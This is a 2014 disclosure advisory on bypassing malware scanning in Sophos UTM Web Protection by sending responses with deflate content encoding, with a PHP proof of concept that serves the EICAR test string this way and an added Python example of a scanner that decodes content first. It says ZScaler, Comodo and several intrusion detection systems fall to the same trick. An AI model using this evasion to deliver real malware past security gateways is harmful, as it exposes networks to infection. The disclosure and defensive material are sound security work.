December 2014

Please note that republishing this article in full or in part is only allowed under the conditions described here.

Bypassing Malware Scanning in Sophos UTM Web Protection

From the product description of Sophos UTM Web Protection:

Our Secure Web Gateway prevents malware infections and gives you control over your employees’ web use. Spyware and viruses are stopped before they can enter the network. And, you can quickly create policies that set where and how employees spend time online. ...
Highlights: ...Prevent infection with dual, independent antivirus engines

Unfortunately, the malware protection could easily be bypassed by using HTTP compression with a content encoding of deflate. For example, the EICAR test virus can be delivered like this:

    <?php
    // Serve the body as a raw deflate stream so that a scanner which does not
    // decode Content-Encoding never sees the uncompressed payload.
    header('HTTP/1.0 200 ok');
    header('Content-type: text/plain');
    header('Content-Encoding: deflate');

    // EICAR compressed with RFC 1951 (raw deflate, no zlib header)
    echo base64_decode('izD1VwxQdXAMiDaJCYiKMDXRCIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAA==');
    exit(0);
    ?>
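The defensive side of this, as an added example that is not part of the original article or of Sophos' code: a scanner must undo the Content-Encoding before matching, and "deflate" has to be handled both as a zlib-wrapped stream (RFC 1950, what RFC 7230 specifies) and as a raw RFC 1951 stream (what the PHP snippet above sends). The marker string, the helper names and the sample responses below are constructed for the demonstration; a real engine would match on the EICAR string or its own signature set.

```python
import gzip
import zlib

# Constructed stand-in for a scanner signature (not malware, not the EICAR string).
MARKER = b"CONSTRUCTED-TEST-SIGNATURE-NOT-MALWARE"


def naive_scan(body: bytes) -> bool:
    """Scanner that inspects the wire bytes without honouring Content-Encoding."""
    return MARKER in body


def decode_content_encoding(body: bytes, content_encoding: str) -> bytes:
    """Undo every coding listed in Content-Encoding.

    Codings are applied by the sender in the order listed, so they are removed
    right to left. "deflate" is tried first as zlib-wrapped (RFC 1950) and then
    as raw deflate (RFC 1951), because both are seen on the wire.
    """
    codings = [c.strip().lower() for c in content_encoding.split(",") if c.strip()]
    for coding in reversed(codings):
        if coding == "identity":
            continue
        if coding in ("gzip", "x-gzip"):
            body = gzip.decompress(body)
        elif coding == "deflate":
            try:
                body = zlib.decompress(body)                    # RFC 1950
            except zlib.error:
                body = zlib.decompress(body, -zlib.MAX_WBITS)   # RFC 1951
        else:
            raise ValueError(f"unsupported content coding: {coding}")
    return body


def decoding_scan(body: bytes, content_encoding: str) -> bool:
    """Scanner that normalises the body before matching, as the fix requires."""
    return naive_scan(decode_content_encoding(body, content_encoding))


def raw_deflate(data: bytes) -> bytes:
    """Produce an RFC 1951 raw deflate stream, the form used by the PHP snippet."""
    comp = zlib.compressobj(level=9, wbits=-zlib.MAX_WBITS)
    return comp.compress(data) + comp.flush()


def demo() -> dict:
    """Compare both scanners over constructed responses; returns {name: (naive, decoding)}."""
    plain = b"harmless prefix " + MARKER + b" harmless suffix"
    responses = {
        "identity": (plain, "identity"),
        "zlib-deflate": (zlib.compress(plain), "deflate"),
        "raw-deflate": (raw_deflate(plain), "deflate"),
        "gzip": (gzip.compress(plain), "gzip"),
        "gzip-then-deflate": (raw_deflate(gzip.compress(plain)), "gzip, deflate"),
    }
    return {name: (naive_scan(body), decoding_scan(body, enc))
            for name, (body, enc) in responses.items()}


if __name__ == "__main__":
    for name, (naive, fixed) in demo().items():
        print(f"{name:18s} naive={naive!s:5s} decoding={fixed}")
```

Only the identity response is caught by the naive scanner; every compressed variant, including the raw deflate form from the snippet above, is caught once the body is decoded first. A production gateway would also cap the decompressed size to avoid decompression bombs, which this example leaves out.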

The problem was reported to Sophos on Friday, 10/31/2014 and confirmed the following Tuesday. It was fixed in their next patches, 9.209 on 11/27/2014 and 9.303 on 12/04/2014, with the release note:

33691: HTTP responses which contain malware and are delivered with “Content-Encoding: deflate” are not caught by virus scanners

Please note that the ZScaler and Comodo Web Inspector URL scanners can also be easily bypassed the same way. VirusTotal and Intrusion Detection Systems (IDS) like Bro, Snort and Suricata, and probably other IDS and firewalls, can be bypassed in similar ways.